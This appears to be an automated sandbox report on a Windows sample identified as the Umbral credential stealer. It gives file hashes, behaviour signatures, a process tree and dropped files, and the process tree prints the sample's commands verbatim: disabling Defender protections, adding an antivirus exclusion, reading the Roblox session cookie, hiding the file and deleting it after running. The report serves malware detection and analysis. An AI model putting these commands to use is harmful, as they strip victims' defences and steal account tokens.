Analysis

  • max time kernel
    42s
  • max time network
    40s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    10-08-2024 00:49

General

  • Target

    both executors.sfx.exe

  • Size

    20.3MB

  • MD5

    031e8de494548e53e70a0fb6b663eda4

  • SHA1

    0d5c7733fefbaec2fcb7b65f827ac555aadcaebf

  • SHA256

    cad2b6b2e9fbc51734757d518386ce7940fb6d0bfa887268d313faa7e19d4ec7

  • SHA512

    8915d0cae49f55166546496940721293a5bbcf14bfd337022458d944d410b42b1ae4768d062c8f2eafec4380e346f59bfe8a676ab2cafcd84956e53eb2a4d064

  • SSDEEP

    393216:9OrF7Xbsfeg2E3Zr62Q07vnUPHzWjtb2c75AOxeOlNUnBS8T/RnB:9ORI328Zr6JtTWjtb2c75AOI7n0+/RnB

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\both executors.sfx.exe
    "C:\Users\Admin\AppData\Local\Temp\both executors.sfx.exe"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Users\Admin\AppData\Local\Temp\solara.exe
      "C:\Users\Admin\AppData\Local\Temp\solara.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1644
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1980
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\solara.exe"
        3⤵
        • Views/modifies file attributes
        PID:404
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\solara.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2592
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1344
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2272
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2004
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2024
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:1228
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:1556
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2972
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:2336
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\solara.exe" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2188
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2616

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\bin\Monaco\package\esm\vs\base\browser\ui\iconLabel\iconHoverDelegate.js

        Filesize

        368B

        MD5

        dff5cd240217dc0e722c27be242db91d

        SHA1

        244d1e7b3a10bb26e52ad9019e0e20f8bb3a72aa

        SHA256

        151caa77914089aa02273bb851f4b9a198eaab38da7eb9e4bdd7af8075c2dc57

        SHA512

        e6033e28f65f29ec3a7fc2e367bb6dd2909e38e5e5ccd267fe920e82c25de00c3cf5593db022dc1664ec00652882d5093121f2686788ee3eb60d0b2d87fef6d5

      • C:\Users\Admin\AppData\Local\Temp\bin\Monaco\package\esm\vs\language\json\_deps\vscode-languageserver-textdocument\lib\esm\main.js

        Filesize

        10KB

        MD5

        722df93c13e5a9e4b3a42c515d6281e3

        SHA1

        e046b8875a0373f38e8135f6500bc9deb9b1cc34

        SHA256

        bb9e7de4f27538b132cd593302a62f8a42f433e1b0e04a1edb4472a97d6ddf46

        SHA512

        6e1db81e7286e7762cce5c281c1ddab227ab374c5c33ff45a5031275592a84fd47547b6ad496f302bbca0bbdc01ed899ff8ed87f22bb8b88973a257e345b70ac

      • C:\Users\Admin\AppData\Local\Temp\bin\Monaco\package\esm\vs\language\json\_deps\vscode-languageserver-types\main.js

        Filesize

        66KB

        MD5

        f80215fcc9a89ba7be3bc0b32cacb094

        SHA1

        8449846cc76fc770a31e310882454f5d6beae342

        SHA256

        1adcb7cc0756472bc16ace850f3f5b6d5746ea4af2d75ad0785b967dd07bf9f1

        SHA512

        7187397ff691dfe558c00a8393d4d3d86b7ab8fdbed8b40ecd43c8ba3af40f8ceab0f78d001cc892ea0d5b5a36be4a559715a4385b39a6db1ce473b2883513b0

      • C:\Users\Admin\AppData\Local\Temp\bin\Monaco\package\esm\vs\language\json\_deps\vscode-uri\index.js

        Filesize

        11KB

        MD5

        db7069b3b398babf3a2a97e7f7c3aa65

        SHA1

        2208bc3bb4548247d672cbd3368dbb992ce6d312

        SHA256

        15fce1bc78e59f11f36c62e31b6db98d10cf5810fcb8fceeecf9cbdd2ac9742d

        SHA512

        326716687bed34d862a71df1c7259988de21ef78af8829d2253f099988818200477df7e13f97fa78671d426a856feaa651d1c8350f7edac5d59ec9bc13f354d3

      • C:\Users\Admin\AppData\Local\Temp\bin\Monaco\package\esm\vs\language\json\fillers\monaco-editor-core.d.ts

        Filesize

        37B

        MD5

        604924c7fd140e65f677cff5c06ea77e

        SHA1

        60adb20bf4cac895df6b31a4da98a4d2267ca3e6

        SHA256

        87b3728d7af0f6c25f9cdbedfbc093f5e46a24371910199a638a1a13e3444668

        SHA512

        34affd619893b93ebfeb0d19daf6c4768b0e3de7d4d8272058cd41608ef9a1f5ceb5951b0b8a7732dd4e3e020d51bda9c9509eed4a3a5705d3a1ad396d610af1

      • C:\Users\Admin\AppData\Local\Temp\bin\Monaco\package\esm\vs\language\json\fillers\monaco-editor-core.js

        Filesize

        404B

        MD5

        40fc593844c4ee88ff8e87481824dda0

        SHA1

        c2d8bed92d90e685576812d7c62ac2db28af2185

        SHA256

        a27649c652a7abcefe0b54567eb64f1cdf9be521bab22cfb71718e816b160375

        SHA512

        0457cf90d188e803401555e57a24647e592830ddad9e9e73d64a89889ec6b40eb15d2330ba507c6bad2faceb6c14bb643b4557db1e68896354aa6a19a99ae357

      • C:\Users\Admin\AppData\Local\Temp\bin\Monaco\package\esm\vs\language\json\fillers\vscode-nls.js

        Filesize

        1KB

        MD5

        1e2ca4b54776b992ed920a66940bca7a

        SHA1

        86ed5c8360d31c4763c05184fa4e7cc46cfa9354

        SHA256

        539191b86cffb8607fc04d0369756281f63bcb884cbe6ea729a668edf4018059

        SHA512

        fb249812b6587078d8a715d4c684af62db0ed05f6d80afb3374fe1f1e0a0a11b2c2551fcb738f3383b88152f95ca889c7c81543da7575d8d8b161d5c9ffea07b

      • C:\Users\Admin\AppData\Local\Temp\bin\Monaco\package\esm\vs\platform\telemetry\common\gdprTypings.js

        Filesize

        12B

        MD5

        5c7f99e3d4eaae821996a487acc6a5e2

        SHA1

        9ff99e6a0a31241fe503c3c76a340bedfe2902b7

        SHA256

        f761c91419d0a89422a0004ef1a92929dd4d2d5e5c16758654d8b0467d1998c6

        SHA512

        9247b46a096ad45b486e4b83bb880a7d4e0da7731e3e64b8ba41513a0632932d3bfcf132b2d20e81e363c2595aa9a38d486111dc6365c0f014c1af25ec0be839

      • C:\Users\Admin\AppData\Local\Temp\bin\Monaco\package\min\vs\base\browser\ui\codicons\codicon\codicon.ttf

        Filesize

        63KB

        MD5

        b13daaad214ef227a36fefd95d924380

        SHA1

        95791fc8733a4bae907859b1a46bd1115f90c983

        SHA256

        774c4acc42f27289850537e2b6e9b85f67fde54145f6f41876dc4f65b45a4a20

        SHA512

        ad05613494a490e01504a30e34d7fb5bc2e535d70b5e5d5154a81ad1acaa51c0e368a6fae6aaa0a42faaae63f7e751a98748a7c291056100b7ad687ff6ae687d

      • C:\Users\Admin\AppData\Local\Temp\solara.exe

        Filesize

        652KB

        MD5

        dc1757e9337c0d6e64c896ee8a992bf6

        SHA1

        ec4684cd93c4826c7ed2b3542fe51855ab165efd

        SHA256

        e13fd15bccd8240360d0374a0d4dbbb80e4b92385ff6a2d5c2753fae8c55fe67

        SHA512

        428550a33954e81b15a6cb25eb7fe0c58ee71c755914a2bdeb4e48d39b4f4a5fd5dbbeea19b992407167d404e49deffee5ce5a3f65557508d5c198a6b7ae00b7

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        68207b43be019d077085c11982cbcc8a

        SHA1

        04b804ccb78dd7415bc282744b553e9c9a60de8b

        SHA256

        4933a0584df49106d241027e8f44f6558a890284b0ac321b45b0e0e483b3cf78

        SHA512

        7ff98c65e64050bc0783264249b7825f87fd7b9e0b421173614f444f5b35cf33089e3b1f1b3cdfba2d12b090e467981196173e9ab20c38cb89fdb6870b145793

      • memory/1344-2378-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

        Filesize

        2.9MB

      • memory/1344-2379-0x0000000001E00000-0x0000000001E08000-memory.dmp

        Filesize

        32KB

      • memory/1644-2365-0x000007FEF42B3000-0x000007FEF42B4000-memory.dmp

        Filesize

        4KB

      • memory/1644-2366-0x0000000000E30000-0x0000000000ED8000-memory.dmp

        Filesize

        672KB

      • memory/2592-2371-0x000000001B740000-0x000000001BA22000-memory.dmp

        Filesize

        2.9MB

      • memory/2592-2372-0x0000000001E10000-0x0000000001E18000-memory.dmp

        Filesize

        32KB

      • memory/2972-2406-0x0000000002810000-0x0000000002818000-memory.dmp

        Filesize

        32KB